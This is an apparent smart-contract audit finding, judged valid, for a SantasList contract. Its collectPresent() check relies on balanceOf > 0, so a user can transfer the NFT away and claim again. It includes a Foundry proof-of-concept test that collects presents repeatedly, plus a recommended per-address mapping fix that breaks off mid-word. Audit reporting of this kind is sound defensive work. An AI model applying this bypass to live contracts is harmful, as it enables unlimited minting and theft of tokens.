Submission Details
Severity: high
Valid

Presents can be collected multiple times with only one address

Summary

An attacker can collect presents many times, without limit, using only one valid address.

Vulnerability Details

The function collectPresent() limits a user to collecting only once per valid address by checking the address's balance: if (balanceOf(msg.sender) > 0). An attacker can easily bypass this check by sending the token to another address before calling collectPresent() again.

Test code for POC:

function testCanCollectPresentAfterAlreadyCollected() public {
    // santa marks the user as NICE in both checks
    vm.startPrank(santa);
    santasList.checkList(user, SantasList.Status.NICE);
    santasList.checkTwice(user, SantasList.Status.NICE);
    vm.stopPrank();
    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
    vm.startPrank(user);
    santasList.collectPresent();
    // transfer nft to user2
    santasList.safeTransferFrom(user, user2, 0);
    // collect present again
    santasList.collectPresent();
    // transfer nft to user2
    santasList.safeTransferFrom(user, user2, 1);
    // collect present again
    santasList.collectPresent();
}

Impact

An attacker can mint an unlimited amount of santasList NFTs and santasToken.

Tools Used

Manual Review & Foundry

Recommendations

Implement a mapping from address to a collected status that records whether the address has already called collectPresent(), e.g. mapping(address => bool) collectedPreson
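
The recommendation above, sketched as an added example (not the audited SantasList code and not part of the original submission): a simplified contract that puts the balance-based guard next to a per-address claim record. The contract name, `hasCollected`, and the minimal mint/transfer logic are assumptions; the eligibility and timing checks are left out.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example: simplified stand-in for the contract in this finding,
// not the audited source. Only the "already collected" guard is modelled.
contract PresentGuardSketch {
    error AlreadyCollected();

    mapping(address => uint256) public balanceOf; // NFT count per holder
    mapping(uint256 => address) public ownerOf;
    mapping(address => bool) public hasCollected; // hypothetical name for the recommended mapping
    uint256 public nextTokenId;

    // Weak guard described in the finding: an address holding zero NFTs
    // is treated as one that has never collected.
    function collectPresentWeak() external {
        if (balanceOf[msg.sender] > 0) revert AlreadyCollected();
        _mint(msg.sender);
    }

    // Hardened guard: the claim is recorded per address and never cleared,
    // so transferring the NFT away does not reopen it.
    function collectPresentFixed() external {
        if (hasCollected[msg.sender]) revert AlreadyCollected();
        hasCollected[msg.sender] = true; // record the claim before minting
        _mint(msg.sender);
    }

    // Minimal owner-only transfer, enough to show the sender's balance
    // returning to zero after a present has been collected.
    function transferFrom(address from, address to, uint256 tokenId) external {
        require(msg.sender == from && ownerOf[tokenId] == from, "not owner");
        require(to != address(0), "zero address");
        ownerOf[tokenId] = to;
        balanceOf[from] -= 1;
        balanceOf[to] += 1;
    }

    function _mint(address to) private {
        uint256 tokenId = nextTokenId++;
        ownerOf[tokenId] = to;
        balanceOf[to] += 1;
    }
}
```

A regression test for the fixed path would collect once, transfer the token out, and expect the second collectPresentFixed() call to revert with AlreadyCollected.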

Updates

Lead Judging Commences

inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
